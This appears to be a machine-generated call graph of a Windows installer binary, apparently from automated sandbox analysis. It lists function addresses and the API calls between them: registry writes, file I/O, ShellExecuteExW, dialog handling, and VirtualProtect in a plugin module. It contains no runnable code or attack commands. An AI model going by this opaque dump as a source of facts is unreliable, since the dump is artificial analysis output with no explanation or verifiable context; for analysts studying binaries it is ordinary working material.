lstrlenW 4497->4500 4498 402438 4499 402444 4498->4499 4511 402c1f 4498->4511 4502 402463 RegSetValueExW 4499->4502 4514 403116 4499->4514 4500->4498 4504 402479 RegCloseKey 4502->4504 4506 40288b 4504->4506 4508 402cec 4507->4508 4535 40611f 4508->4535 4512 4062a6 17 API calls 4511->4512 4513 402c34 4512->4513 4513->4499 4515 40312f 4514->4515 4516 40315a 4515->4516 4549 403311 SetFilePointer 4515->4549 4539 4032fb 4516->4539 4520 403177 GetTickCount 4531 40318a 4520->4531 4521 40329b 4522 40329f 4521->4522 4526 4032b7 4521->4526 4523 4032fb ReadFile 4522->4523 4529 403285 4523->4529 4524 4032fb ReadFile 4524->4526 4525 4032fb ReadFile 4525->4531 4526->4524 4527 405e2c WriteFile 4526->4527 4526->4529 4527->4526 4529->4502 4530 4031f0 GetTickCount 4530->4531 4531->4525 4531->4529 4531->4530 4532 403219 MulDiv wsprintfW 4531->4532 4534 405e2c WriteFile 4531->4534 4542 4067df 4531->4542 4533 4052ec 24 API calls 4532->4533 4533->4531 4534->4531 4536 40612e 4535->4536 4537 402410 4536->4537 4538 406139 RegCreateKeyExW 4536->4538 4537->4497 4537->4498 4537->4506 4538->4537 4540 405dfd ReadFile 4539->4540 4541 403165 4540->4541 4541->4520 4541->4521 4541->4529 4543 406804 4542->4543 4544 40680c 4542->4544 4543->4531 4544->4543 4545 406893 GlobalFree 4544->4545 4546 40689c GlobalAlloc 4544->4546 4547 406913 GlobalAlloc 4544->4547 4548 40690a GlobalFree 4544->4548 4545->4546 4546->4543 4546->4544 4547->4543 4547->4544 4548->4547 4549->4516 5337 404c68 GetDlgItem GetDlgItem 5338 404cba 7 API calls 5337->5338 5350 404ed3 5337->5350 5339 404d50 SendMessageW 5338->5339 5340 404d5d DeleteObject 5338->5340 5339->5340 5341 404d66 5340->5341 5343 404d9d 5341->5343 5344 4062a6 17 API calls 5341->5344 5342 404fb7 5346 405063 5342->5346 5352 404ec6 5342->5352 5357 405010 SendMessageW 5342->5357 5345 4041fb 18 API calls 5343->5345 5347 404d7f SendMessageW SendMessageW 5344->5347 5351 404db1 5345->5351 5348 405075 5346->5348 5349 40506d SendMessageW 5346->5349 5347->5341 5359 405087 ImageList_Destroy 5348->5359 5360 40508e 5348->5360 5368 40509e 5348->5368 5349->5348 5350->5342 5355 404bb6 5 API calls 5350->5355 5371 404f44 5350->5371 5356 4041fb 18 API calls 5351->5356 5353 404262 8 API calls 5352->5353 5358 405259 5353->5358 5354 404fa9 SendMessageW 5354->5342 5355->5371 5372 404dbf 5356->5372 5357->5352 5362 405025 SendMessageW 5357->5362 5359->5360 5363 405097 GlobalFree 5360->5363 5360->5368 5361 40520d 5361->5352 5366 40521f ShowWindow GetDlgItem ShowWindow 5361->5366 5365 405038 5362->5365 5363->5368 5364 404e94 GetWindowLongW SetWindowLongW 5367 404ead 5364->5367 5374 405049 SendMessageW 5365->5374 5366->5352 5369 404eb3 ShowWindow 5367->5369 5370 404ecb 5367->5370 5368->5361 5373 4050d9 5368->5373 5381 404c36 4 API calls 5368->5381 5388 404230 SendMessageW 5369->5388 5389 404230 SendMessageW 5370->5389 5371->5342 5371->5354 5372->5364 5375 404e8e 5372->5375 5378 404e0f SendMessageW 5372->5378 5379 404e4b SendMessageW 5372->5379 5380 404e5c SendMessageW 5372->5380 5384 405107 SendMessageW 5373->5384 5387 40511d 5373->5387 5374->5346 5375->5364 5375->5367 5378->5372 5379->5372 5380->5372 5381->5373 5382 4051e3 InvalidateRect 5382->5361 5383 4051f9 5382->5383 5390 404b71 5383->5390 5384->5387 5386 405191 SendMessageW SendMessageW 5386->5387 5387->5382 5387->5386 5388->5352 5389->5350 5393 404aa8 5390->5393 5392 404b86 5392->5361 5394 404ac1 5393->5394 5395 4062a6 17 API calls 5394->5395 5396 404b25 5395->5396 5397 4062a6 17 API calls 5396->5397 5398 404b30 5397->5398 5399 4062a6 17 API calls 5398->5399 5400 404b46 lstrlenW wsprintfW SetDlgItemTextW 5399->5400 5400->5392 5401 402868 5402 402c41 17 API calls 5401->5402 5403 40286f FindFirstFileW 5402->5403 5404 402882 5403->5404 5405 402897 5403->5405 5409 4061cb wsprintfW 5405->5409 5407 4028a0 5410 406284 lstrcpynW 5407->5410 5409->5407 5410->5404 5411 401968 5412 402c1f 17 API calls 5411->5412 5413 40196f 5412->5413 5414 402c1f 17 API calls 5413->5414 5415 40197c 5414->5415 5416 402c41 17 API calls 5415->5416 5417 401993 lstrlenW 5416->5417 5419 4019a4 5417->5419 5418 4019e5 5419->5418 5423 406284 lstrcpynW 5419->5423 5421 4019d5 5421->5418 5422 4019da lstrlenW 5421->5422 5422->5418 5423->5421 5424 40166a 5425 402c41 17 API calls 5424->5425 5426 401670 5425->5426 5427 4065c7 2 API calls 5426->5427 5428 401676 5427->5428 4599 6fbc2997 4600 6fbc29e7 4599->4600 4601 6fbc29a7 VirtualProtect 4599->4601 4601->4600 5429 40436b lstrlenW 5430 40438a 5429->5430 5431 40438c WideCharToMultiByte 5429->5431 5430->5431 5432 4046ec 5433 404718 5432->5433 5434 404729 5432->5434 5493 4058ce GetDlgItemTextW 5433->5493 5435 404735 GetDlgItem 5434->5435 5442 404794 5434->5442 5437 404749 5435->5437 5441 40475d SetWindowTextW 5437->5441 5445 405c04 4 API calls 5437->5445 5438 404878 5490 404a27 5438->5490 5495 4058ce GetDlgItemTextW 5438->5495 5439 404723 5440 406518 5 API calls 5439->5440 5440->5434 5446 4041fb 18 API calls 5441->5446 5442->5438 5447 4062a6 17 API calls 5442->5447 5442->5490 5444 404262 8 API calls 5449 404a3b 5444->5449 5450 404753 5445->5450 5451 404779 5446->5451 5452 404808 SHBrowseForFolderW 5447->5452 5448 4048a8 5453 405c61 18 API calls 5448->5453 5450->5441 5457 405b59 3 API calls 5450->5457 5454 4041fb 18 API calls 5451->5454 5452->5438 5455 404820 CoTaskMemFree 5452->5455 5456 4048ae 5453->5456 5458 404787 5454->5458 5459 405b59 3 API calls 5455->5459 5496 406284 lstrcpynW 5456->5496 5457->5441 5494 404230 SendMessageW 5458->5494 5462 40482d 5459->5462 5464 404864 SetDlgItemTextW 5462->5464 5468 4062a6 17 API calls 5462->5468 5463 40478d 5466 40665e 5 API calls 5463->5466 5464->5438 5465 4048c5 5467 40665e 5 API calls 5465->5467 5466->5442 5475 4048cc 5467->5475 5469 40484c lstrcmpiW 5468->5469 5469->5464 5471 40485d lstrcatW 5469->5471 5470 40490d 5497 406284 lstrcpynW 5470->5497 5471->5464 5473 404914 5474 405c04 4 API calls 5473->5474 5476 40491a GetDiskFreeSpaceW 5474->5476 5475->5470 5479 405ba5 2 API calls 5475->5479 5480 404965 5475->5480 5478 40493e MulDiv 5476->5478 5476->5480 5478->5480 5479->5475 5481 4049d6 5480->5481 5482 404b71 20 API calls 5480->5482 5483 4049f9 5481->5483 5485 40140b 2 API calls 5481->5485 5484 4049c3 5482->5484 5498 40421d KiUserCallbackDispatcher 5483->5498 5486 4049d8 SetDlgItemTextW 5484->5486 5487 4049c8 5484->5487 5485->5483 5486->5481 5489 404aa8 20 API calls 5487->5489 5489->5481 5490->5444 5491 404a15 5491->5490 5499 404645 5491->5499 5493->5439 5494->5463 5495->5448 5496->5465 5497->5473 5498->5491 5500 404653 5499->5500 5501 404658 SendMessageW 5499->5501 5500->5501 5501->5490 4668 40176f 4669 402c41 17 API calls 4668->4669 4670 401776 4669->4670 4671 401796 4670->4671 4672 40179e 4670->4672 4708 406284 lstrcpynW 4671->4708 4709 406284 lstrcpynW 4672->4709 4675 40179c 4679 406518 5 API calls 4675->4679 4676 4017a9 4677 405b59 3 API calls 4676->4677 4678 4017af lstrcatW 4677->4678 4678->4675 4684 4017bb 4679->4684 4680 4017f7 4682 405d55 2 API calls 4680->4682 4681 4065c7 2 API calls 4681->4684 4682->4684 4684->4680 4684->4681 4685 4017cd CompareFileTime 4684->4685 4686 40188d 4684->4686 4687 401864 4684->4687 4690 406284 lstrcpynW 4684->4690 4696 4062a6 17 API calls 4684->4696 4707 405d7a GetFileAttributesW CreateFileW 4684->4707 4710 4058ea 4684->4710 4685->4684 4688 4052ec 24 API calls 4686->4688 4689 4052ec 24 API calls 4687->4689 4706 401879 4687->4706 4691 401897 4688->4691 4689->4706 4690->4684 4692 403116 35 API calls 4691->4692 4693 4018aa 4692->4693 4694 4018be SetFileTime 4693->4694 4695 4018d0 CloseHandle 4693->4695 4694->4695 4697 4018e1 4695->4697 4695->4706 4696->4684 4698 4018e6 4697->4698 4699 4018f9 4697->4699 4700 4062a6 17 API calls 4698->4700 4701 4062a6 17 API calls 4699->4701 4703 4018ee lstrcatW 4700->4703 4704 401901 4701->4704 4703->4704 4705 4058ea MessageBoxIndirectW 4704->4705 4705->4706 4707->4684 4708->4675 4709->4676 4711 4058ff 4710->4711 4712 40594b 4711->4712 4713 405913 MessageBoxIndirectW 4711->4713 4712->4684 4713->4712 4714 4027ef 4715 402a70 4714->4715 4716 4027f6 4714->4716 4717 402c1f 17 API calls 4716->4717 4718 4027fd 4717->4718 4719 40280c SetFilePointer 4718->4719 4719->4715 4720 40281c 4719->4720 4722 4061cb wsprintfW 4720->4722 4722->4715 5502 401a72 5503 402c1f 17 API calls 5502->5503 5504 401a7b 5503->5504 5505 402c1f 17 API calls 5504->5505 5506 401a20 5505->5506 5514 401573 5515 401583 ShowWindow 5514->5515 5516 40158c 5514->5516 5515->5516 5517 402ac5 5516->5517 5518 40159a ShowWindow 5516->5518 5518->5517 5519 401cf3 5520 402c1f 17 API calls 5519->5520 5521 401cf9 IsWindow 5520->5521 5522 401a20 5521->5522 5523 402df3 5524 402e05 SetTimer 5523->5524 5526 402e1e 5523->5526 5524->5526 5525 402e73 5526->5525 5527 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5526->5527 5527->5525 5528 4014f5 SetForegroundWindow 5529 402ac5 5528->5529 5530 402576 5531 402c41 17 API calls 5530->5531 5532 40257d 5531->5532 5535 405d7a GetFileAttributesW CreateFileW 5532->5535 5534 402589 5535->5534 4909 401b77 4910 401b84 4909->4910 4911 401bc8 4909->4911 4916 401b9b 4910->4916 4918 401c0d 4910->4918 4912 401bf2 GlobalAlloc 4911->4912 4913 401bcd 4911->4913 4915 4062a6 17 API calls 4912->4915 4924 4022f7 4913->4924 4930 406284 lstrcpynW 4913->4930 4914 4062a6 17 API calls 4919 4022f1 4914->4919 4915->4918 4928 406284 lstrcpynW 4916->4928 4918->4914 4918->4924 4922 4058ea MessageBoxIndirectW 4919->4922 4921 401bdf GlobalFree 4921->4924 4922->4924 4923 401baa 4929 406284 lstrcpynW 4923->4929 4926 401bb9 4931 406284 lstrcpynW 4926->4931 4928->4923 4929->4926 4930->4921 4931->4924 5536 4024f8 5537 402c81 17 API calls 5536->5537 5538 402502 5537->5538 5539 402c1f 17 API calls 5538->5539 5540 40250b 5539->5540 5541 402533 RegEnumValueW 5540->5541 5542 402527 RegEnumKeyW 5540->5542 5544 40288b 5540->5544 5543 402548 RegCloseKey 5541->5543 5542->5543 5543->5544 5546 40167b 5547 402c41 17 API calls 5546->5547 5548 401682 5547->5548 5549 402c41 17 API calls 5548->5549 5550 40168b 5549->5550 5551 402c41 17 API calls 5550->5551 5552 401694 MoveFileW 5551->5552 5553 4016a0 5552->5553 5554 4016a7 5552->5554 5555 401423 24 API calls 5553->5555 5556 4065c7 2 API calls 5554->5556 5558 402250 5554->5558 5555->5558 5557 4016b6 5556->5557 5557->5558 5559 40604a 36 API calls 5557->5559 5559->5553 5560 6fbc1000 5561 6fbc101b 5 API calls 5560->5561 5562 6fbc1019 5561->5562 5563 401e7d 5564 402c41 17 API calls 5563->5564 5565 401e83 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e8c 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e95 5568->5569 5570 402c41 17 API calls 5569->5570 5571 401e9e 5570->5571 5572 401423 24 API calls 5571->5572 5573 401ea5 5572->5573 5580 4058b0 ShellExecuteExW 5573->5580 5575 401ee7 5577 40288b 5575->5577 5581 40670f WaitForSingleObject 5575->5581 5578 401f01 CloseHandle 5578->5577 5580->5575 5582 406729 5581->5582 5583 40673b GetExitCodeProcess 5582->5583 5584 40669a 2 API calls 5582->5584 5583->5578 5585 406730 WaitForSingleObject 5584->5585 5585->5582 5586 6fbc2301 5587 6fbc236b 5586->5587 5588 6fbc2395 5587->5588 5589 6fbc2376 GlobalAlloc 5587->5589 5589->5587 5590 4019ff 5591 402c41 17 API calls 5590->5591 5592 401a06 5591->5592 5593 402c41 17 API calls 5592->5593 5594 401a0f 5593->5594 5595 401a16 lstrcmpiW 5594->5595 5596 401a28 lstrcmpW 5594->5596 5597 401a1c 5595->5597 5596->5597 5598 401000 5599 401037 BeginPaint GetClientRect 5598->5599 5602 40100c DefWindowProcW 5598->5602 5600 4010f3 5599->5600 5604 401073 CreateBrushIndirect FillRect DeleteObject 5600->5604 5605 4010fc 5600->5605 5603 401179 5602->5603 5604->5600 5606 401102 CreateFontIndirectW 5605->5606 5607 401167 EndPaint 5605->5607 5606->5607 5608 401112 6 API calls 5606->5608 5607->5603 5608->5607 5616 401503 5617 40150b 5616->5617 5619 40151e 5616->5619 5618 402c1f 17 API calls 5617->5618 5618->5619 4550 402484 4561 402c81 4550->4561 4553 402c41 17 API calls 4554 402497 4553->4554 4555 4024a2 RegQueryValueExW 4554->4555 4559 40288b 4554->4559 4556 4024c8 RegCloseKey 4555->4556 4557 4024c2 4555->4557 4556->4559 4557->4556 4566 4061cb wsprintfW 4557->4566 4562 402c41 17 API calls 4561->4562 4563 402c98 4562->4563 4564 4060f1 RegOpenKeyExW 4563->4564 4565 40248e 4564->4565 4565->4553 4566->4556 5620 402104 5621 402c41 17 API calls 5620->5621 5622 40210b 5621->5622 5623 402c41 17 API calls 5622->5623 5624 402115 5623->5624 5625 402c41 17 API calls 5624->5625 5626 40211f 5625->5626 5627 402c41 17 API calls 5626->5627 5628 402129 5627->5628 5629 402c41 17 API calls 5628->5629 5631 402133 5629->5631 5630 402172 CoCreateInstance 5635 402191 5630->5635 5631->5630 5632 402c41 17 API calls 5631->5632 5632->5630 5633 401423 24 API calls 5634 402250 5633->5634 5635->5633 5635->5634 5636 401f06 5637 402c41 17 API calls 5636->5637 5638 401f0c 5637->5638 5639 4052ec 24 API calls 5638->5639 5640 401f16 5639->5640 5641 40586d 2 API calls 5640->5641 5642 401f1c 5641->5642 5644 40288b 5642->5644 5645 40670f 5 API calls 5642->5645 5647 401f3f CloseHandle 5642->5647 5646 401f31 5645->5646 5646->5647 5649 4061cb wsprintfW 5646->5649 5647->5644 5649->5647 4658 40230c 4659 402314 4658->4659 4660 40231a 4658->4660 4661 402c41 17 API calls 4659->4661 4662 402c41 17 API calls 4660->4662 4664 402328 4660->4664 4661->4660 4662->4664 4663 402336 4666 402c41 17 API calls 4663->4666 4664->4663 4665 402c41 17 API calls 4664->4665 4665->4663 4667 40233f WritePrivateProfileStringW 4666->4667 5650 40190c 5651 401943 5650->5651 5652 402c41 17 API calls 5651->5652 5653 401948 5652->5653 5654 405996 67 API calls 5653->5654 5655 401951 5654->5655 5656 401f8c 5657 402c41 17 API calls 5656->5657 5658 401f93 5657->5658 5659 40665e 5 API calls 5658->5659 5660 401fa2 5659->5660 5661 402026 5660->5661 5662 401fbe GlobalAlloc 5660->5662 5662->5661 5663 401fd2 5662->5663 5664 40665e 5 API calls 5663->5664 5665 401fd9 5664->5665 5666 40665e 5 API calls 5665->5666 5667 401fe3 5666->5667 5667->5661 5671 4061cb wsprintfW 5667->5671 5669 402018 5672 4061cb wsprintfW 5669->5672 5671->5669 5672->5661 5673 6fbc1671 5674 6fbc1516 GlobalFree 5673->5674 5677 6fbc1689 5674->5677 5675 6fbc16cf GlobalFree 5676 6fbc16a4 5676->5675 5677->5675 5677->5676 5678 6fbc16bb VirtualFree 5677->5678 5678->5675 5679 40238e 5680 4023c1 5679->5680 5681 402396 5679->5681 5682 402c41 17 API calls 5680->5682 5683 402c81 17 API calls 5681->5683 5684 4023c8 5682->5684 5685 40239d 5683->5685 5690 402cff 5684->5690 5687 402c41 17 API calls 5685->5687 5688 4023d5 5685->5688 5689 4023ae RegDeleteValueW RegCloseKey 5687->5689 5689->5688 5691 402d13 5690->5691 5692 402d0c 5690->5692 5691->5692 5694 402d44 5691->5694 5692->5688 5695 4060f1 RegOpenKeyExW 5694->5695 5696 402d72 5695->5696 5697 402d98 RegEnumKeyW 5696->5697 5698 402daf RegCloseKey 5696->5698 5699 402dd0 RegCloseKey 5696->5699 5702 402d44 6 API calls 5696->5702 5704 402dc3 5696->5704 5697->5696 5697->5698 5700 40665e 5 API calls 5698->5700 5699->5704 5701 402dbf 5700->5701 5703 402de0 RegDeleteKeyW 5701->5703 5701->5704 5702->5696 5703->5704 5704->5692 5705 40698e 5707 406812 5705->5707 5706 40717d 5707->5706 5708 406893 GlobalFree 5707->5708 5709 40689c GlobalAlloc 5707->5709 5710 406913 GlobalAlloc 5707->5710 5711 40690a GlobalFree 5707->5711 5708->5709 5709->5706 5709->5707 5710->5706 5710->5707 5711->5710 5712 40190f 5713 402c41 17 API calls 5712->5713 5714 401916 5713->5714 5715 4058ea MessageBoxIndirectW 5714->5715 5716 40191f 5715->5716 5717 401491 5718 4052ec 24 API calls 5717->5718 5719 401498 5718->5719 5720 401d14 5721 402c1f 17 API calls 5720->5721 5722 401d1b 5721->5722 5723 402c1f 17 API calls 5722->5723 5724 401d27 GetDlgItem 5723->5724 5725 402592 5724->5725 5733 402598 5734 4025c7 5733->5734 5735 4025ac 5733->5735 5736 4025fb 5734->5736 5737 4025cc 5734->5737 5738 402c1f 17 API calls 5735->5738 5740 402c41 17 API calls 5736->5740 5739 402c41 17 API calls 5737->5739 5745 4025b3 5738->5745 5741 4025d3 WideCharToMultiByte lstrlenA 5739->5741 5742 402602 lstrlenW 5740->5742 5741->5745 5742->5745 5743 402645 5744 40262f 5744->5743 5746 405e2c WriteFile 5744->5746 5745->5743 5745->5744 5747 405e5b 5 API calls 5745->5747 5746->5743 5747->5744 5748 6fbc10e1 5757 6fbc1111 5748->5757 5749 6fbc11d8 GlobalFree 5750 6fbc12ba 2 API calls 5750->5757 5751 6fbc11d3 5751->5749 5752 6fbc11f8 GlobalFree 5752->5757 5753 6fbc1272 2 API calls 5756 6fbc11c4 GlobalFree 5753->5756 5754 6fbc1164 GlobalAlloc 5754->5757 5755 6fbc12e1 lstrcpyW 5755->5757 5756->5757 5757->5749 5757->5750 5757->5751 5757->5752 5757->5753 5757->5754 5757->5755 5757->5756 5758 40149e 5759 4022f7 5758->5759 5760 4014ac PostQuitMessage 5758->5760 5760->5759 5761 401c1f 5762 402c1f 17 API calls 5761->5762 5763 401c26 5762->5763 5764 402c1f 17 API calls 5763->5764 5765 401c33 5764->5765 5766 401c48 5765->5766 5767 402c41 17 API calls 5765->5767 5768 401c58 5766->5768 5771 402c41 17 API calls 5766->5771 5767->5766 5769 401c63 5768->5769 5770 401caf 5768->5770 5772 402c1f 17 API calls 5769->5772 5773 402c41 17 API calls 5770->5773 5771->5768 5774 401c68 5772->5774 5775 401cb4 5773->5775 5776 402c1f 17 API calls 5774->5776 5777 402c41 17 API calls 5775->5777 5778 401c74 5776->5778 5779 401cbd FindWindowExW 5777->5779 5780 401c81 SendMessageTimeoutW 5778->5780 5781 401c9f SendMessageW 5778->5781 5782 401cdf 5779->5782 5780->5782 5781->5782 5783 402aa0 SendMessageW 5784 402ac5 5783->5784 5785 402aba InvalidateRect 5783->5785 5785->5784 5786 402821 5787 402827 5786->5787 5788 402ac5 5787->5788 5789 40282f FindClose 5787->5789 5789->5788 5790 6fbc18dd 5791 6fbc1900 5790->5791 5792 6fbc1935 GlobalFree 5791->5792 5793 6fbc1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5791->5793 5792->5793 5794 6fbc1272 2 API calls 5793->5794 5795 6fbc1ad2 GlobalFree GlobalFree 5794->5795 4383 403d22 4384 403e75 4383->4384 4385 403d3a 4383->4385 4387 403ec6 4384->4387 4388 403e86 GetDlgItem GetDlgItem 4384->4388 4385->4384 4386 403d46 4385->4386 4389 403d51 SetWindowPos 4386->4389 4390 403d64 4386->4390 4392 403f20 4387->4392 4400 401389 2 API calls 4387->4400 4391 4041fb 18 API calls 4388->4391 4389->4390 4394 403d81 4390->4394 4395 403d69 ShowWindow 4390->4395 4396 403eb0 SetClassLongW 4391->4396 4445 403e70 4392->4445 4454 404247 4392->4454 4397 403da3 4394->4397 4398 403d89 DestroyWindow 4394->4398 4395->4394 4399 40140b 2 API calls 4396->4399 4402 403da8 SetWindowLongW 4397->4402 4403 403db9 4397->4403 4453 404184 4398->4453 4399->4387 4401 403ef8 4400->4401 4401->4392 4404 403efc SendMessageW 4401->4404 4402->4445 4407 403e62 4403->4407 4408 403dc5 GetDlgItem 4403->4408 4404->4445 4405 40140b 2 API calls 4443 403f32 4405->4443 4406 404186 DestroyWindow EndDialog 4406->4453 4476 404262 4407->4476 4411 403dd8 SendMessageW IsWindowEnabled 4408->4411 4412 403df5 4408->4412 4410 4041b5 ShowWindow 4410->4445 4411->4412 4411->4445 4414 403e02 4412->4414 4415 403e49 SendMessageW 4412->4415 4416 403e15 4412->4416 4425 403dfa 4412->4425 4413 4062a6 17 API calls 4413->4443 4414->4415 4414->4425 4415->4407 4418 403e32 4416->4418 4419 403e1d 4416->4419 4422 40140b 2 API calls 4418->4422 4470 40140b 4419->4470 4420 403e30 4420->4407 4424 403e39 4422->4424 4423 4041fb 18 API calls 4423->4443 4424->4407 4424->4425 4473 4041d4 4425->4473 4427 403fad GetDlgItem 4428 403fc2 4427->4428 4429 403fca ShowWindow KiUserCallbackDispatcher 4427->4429 4428->4429 4460 40421d KiUserCallbackDispatcher 4429->4460 4431 403ff4 EnableWindow 4436 404008 4431->4436 4432 40400d GetSystemMenu EnableMenuItem SendMessageW 4433 40403d SendMessageW 4432->4433 4432->4436 4433->4436 4436->4432 4461 404230 SendMessageW 4436->4461 4462 403d03 4436->4462 4465 406284 lstrcpynW 4436->4465 4438 40406c lstrlenW 4439 4062a6 17 API calls 4438->4439 4440 404082 SetWindowTextW 4439->4440 4466 401389 4440->4466 4442 4040c6 DestroyWindow 4444 4040e0 CreateDialogParamW 4442->4444 4442->4453 4443->4405 4443->4406 4443->4413 4443->4423 4443->4442 4443->4445 4457 4041fb 4443->4457 4446 404113 4444->4446 4444->4453 4447 4041fb 18 API calls 4446->4447 4448 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4447->4448 4449 401389 2 API calls 4448->4449 4450 404164 4449->4450 4450->4445 4451 40416c ShowWindow 4450->4451 4452 404247 SendMessageW 4451->4452 4452->4453 4453->4410 4453->4445 4455 404250 SendMessageW 4454->4455 4456 40425f 4454->4456 4455->4456 4456->4443 4458 4062a6 17 API calls 4457->4458 4459 404206 SetDlgItemTextW 4458->4459 4459->4427 4460->4431 4461->4436 4463 4062a6 17 API calls 4462->4463 4464 403d11 SetWindowTextW 4463->4464 4464->4436 4465->4438 4468 401390 4466->4468 4467 4013fe 4467->4443 4468->4467 4469 4013cb MulDiv SendMessageW 4468->4469 4469->4468 4471 401389 2 API calls 4470->4471 4472 401420 4471->4472 4472->4425 4474 4041e1 SendMessageW 4473->4474 4475 4041db 4473->4475 4474->4420 4475->4474 4477 404325 4476->4477 4478 40427a GetWindowLongW 4476->4478 4477->4445 4478->4477 4479 40428f 4478->4479 4479->4477 4480 4042bc GetSysColor 4479->4480 4481 4042bf 4479->4481 4480->4481 4482 4042c5 SetTextColor 4481->4482 4483 4042cf SetBkMode 4481->4483 4482->4483 4484 4042e7 GetSysColor 4483->4484 4485 4042ed 4483->4485 4484->4485 4486 4042f4 SetBkColor 4485->4486 4487 4042fe 4485->4487 4486->4487 4487->4477 4488 404311 DeleteObject 4487->4488 4489 404318 CreateBrushIndirect 4487->4489 4488->4489 4489->4477 5796 4015a3 5797 402c41 17 API calls 5796->5797 5798 4015aa SetFileAttributesW 5797->5798 5799 4015bc 5798->5799 5800 6fbc16d8 5801 6fbc1707 5800->5801 5802 6fbc1b63 22 API calls 5801->5802 5803 6fbc170e 5802->5803 5804 6fbc1715 5803->5804 5805 6fbc1721 5803->5805 5806 6fbc1272 2 API calls 5804->5806 5807 6fbc1748 5805->5807 5808 6fbc172b 5805->5808 5809 6fbc171f 5806->5809 5811 6fbc174e 5807->5811 5812 6fbc1772 5807->5812 5810 6fbc153d 3 API calls 5808->5810 5814 6fbc1730 5810->5814 5815 6fbc15b4 3 API calls 5811->5815 5813 6fbc153d 3 API calls 5812->5813 5813->5809 5816 6fbc15b4 3 API calls 5814->5816 5817 6fbc1753 5815->5817 5819 6fbc1736 5816->5819 5818 6fbc1272 2 API calls 5817->5818 5820 6fbc1759 GlobalFree 5818->5820 5821 6fbc1272 2 API calls 5819->5821 5820->5809 5822 6fbc176d GlobalFree 5820->5822 5823 6fbc173c GlobalFree 5821->5823 5822->5809 5823->5809 5824 6fbc1058 5826 6fbc1074 5824->5826 5825 6fbc10dd 5826->5825 5827 6fbc1092 5826->5827 5828 6fbc1516 GlobalFree 5826->5828 5829 6fbc1516 GlobalFree 5827->5829 5828->5827 5830 6fbc10a2 5829->5830 5831 6fbc10a9 GlobalSize 5830->5831 5832 6fbc10b2 5830->5832 5831->5832 5833 6fbc10c7 5832->5833 5834 6fbc10b6 GlobalAlloc 5832->5834 5836 6fbc10d2 GlobalFree 5833->5836 5835 6fbc153d 3 API calls 5834->5835 5835->5833 5836->5825 5837 4046a5 5838 4046b5 5837->5838 5839 4046db 5837->5839 5840 4041fb 18 API calls 5838->5840 5841 404262 8 API calls 5839->5841 5842 4046c2 SetDlgItemTextW 5840->5842 5843 4046e7 5841->5843 5842->5839 5844 4029a8 5845 402c1f 17 API calls 5844->5845 5846 4029ae 5845->5846 5847 4029d5 5846->5847 5848 4029ee 5846->5848 5853 40288b 5846->5853 5849 4029da 5847->5849 5857 4029eb 5847->5857 5850 402a08 5848->5850 5851 4029f8 5848->5851 5858 406284 lstrcpynW 5849->5858 5852 4062a6 17 API calls 5850->5852 5854 402c1f 17 API calls 5851->5854 5852->5857 5854->5857 5857->5853 5859 4061cb wsprintfW 5857->5859 5858->5853 5859->5853 4602 40542b 4603 4055d5 4602->4603 4604 40544c GetDlgItem GetDlgItem GetDlgItem 4602->4604 4606 405606 4603->4606 4607 4055de GetDlgItem CreateThread CloseHandle 4603->4607 4648 404230 SendMessageW 4604->4648 4609 405631 4606->4609 4612 405656 4606->4612 4613 40561d ShowWindow ShowWindow 4606->4613 4607->4606 4651 4053bf OleInitialize 4607->4651 4608 4054bc 4617 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4608->4617 4610 405691 4609->4610 4611 40563d 4609->4611 4610->4612 4625 40569f SendMessageW 4610->4625 4614 405645 4611->4614 4615 40566b ShowWindow 4611->4615 4616 404262 8 API calls 4612->4616 4650 404230 SendMessageW 4613->4650 4619 4041d4 SendMessageW 4614->4619 4621 40568b 4615->4621 4622 40567d 4615->4622 4620 405664 4616->4620 4623 405531 4617->4623 4624 405515 SendMessageW SendMessageW 4617->4624 4619->4612 4627 4041d4 SendMessageW 4621->4627 4626 4052ec 24 API calls 4622->4626 4628 405544 4623->4628 4629 405536 SendMessageW 4623->4629 4624->4623 4625->4620 4630 4056b8 CreatePopupMenu 4625->4630 4626->4621 4627->4610 4632 4041fb 18 API calls 4628->4632 4629->4628 4631 4062a6 17 API calls 4630->4631 4633 4056c8 AppendMenuW 4631->4633 4634 405554 4632->4634 4635 4056e5 GetWindowRect 4633->4635 4636 4056f8 TrackPopupMenu 4633->4636 4637 405591 GetDlgItem SendMessageW 4634->4637 4638 40555d ShowWindow 4634->4638 4635->4636 4636->4620 4639 405713 4636->4639 4637->4620 4642 4055b8 SendMessageW SendMessageW 4637->4642 4640 405580 4638->4640 4641 405573 ShowWindow 4638->4641 4643 40572f SendMessageW 4639->4643 4649 404230 SendMessageW 4640->4649 4641->4640 4642->4620 4643->4643 4644 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4643->4644 4646 405771 SendMessageW 4644->4646 4646->4646 4647 40579a GlobalUnlock SetClipboardData CloseClipboard 4646->4647 4647->4620 4648->4608 4649->4637 4650->4609 4652 404247 SendMessageW 4651->4652 4655 4053e2 4652->4655 4653 405409 4654 404247 SendMessageW 4653->4654 4656 40541b OleUninitialize 4654->4656 4655->4653 4657 401389 2 API calls 4655->4657 4657->4655 5867 4028ad 5868 402c41 17 API calls 5867->5868 5870 4028bb 5868->5870 5869 4028d1 5872 405d55 2 API calls 5869->5872 5870->5869 5871 402c41 17 API calls 5870->5871 5871->5869 5873 4028d7 5872->5873 5895 405d7a GetFileAttributesW CreateFileW 5873->5895 5875 4028e4 5876 4028f0 GlobalAlloc 5875->5876 5877 402987 5875->5877 5878 402909 5876->5878 5879 40297e CloseHandle 5876->5879 5880 4029a2 5877->5880 5881 40298f DeleteFileW 5877->5881 5896 403311 SetFilePointer 5878->5896 5879->5877 5881->5880 5883 40290f 5884 4032fb ReadFile 5883->5884 5885 402918 GlobalAlloc 5884->5885 5886 402928 5885->5886 5887 40295c 5885->5887 5889 403116 35 API calls 5886->5889 5888 405e2c WriteFile 5887->5888 5890 402968 GlobalFree 5888->5890 5894 402935 5889->5894 5891 403116 35 API calls 5890->5891 5892 40297b 5891->5892 5892->5879 5893 402953 GlobalFree 5893->5887 5894->5893 5895->5875 5896->5883 5897 401a30 5898 402c41 17 API calls 5897->5898 5899 401a39 ExpandEnvironmentStringsW 5898->5899 5900 401a4d 5899->5900 5902 401a60 5899->5902 5901 401a52 lstrcmpW 5900->5901 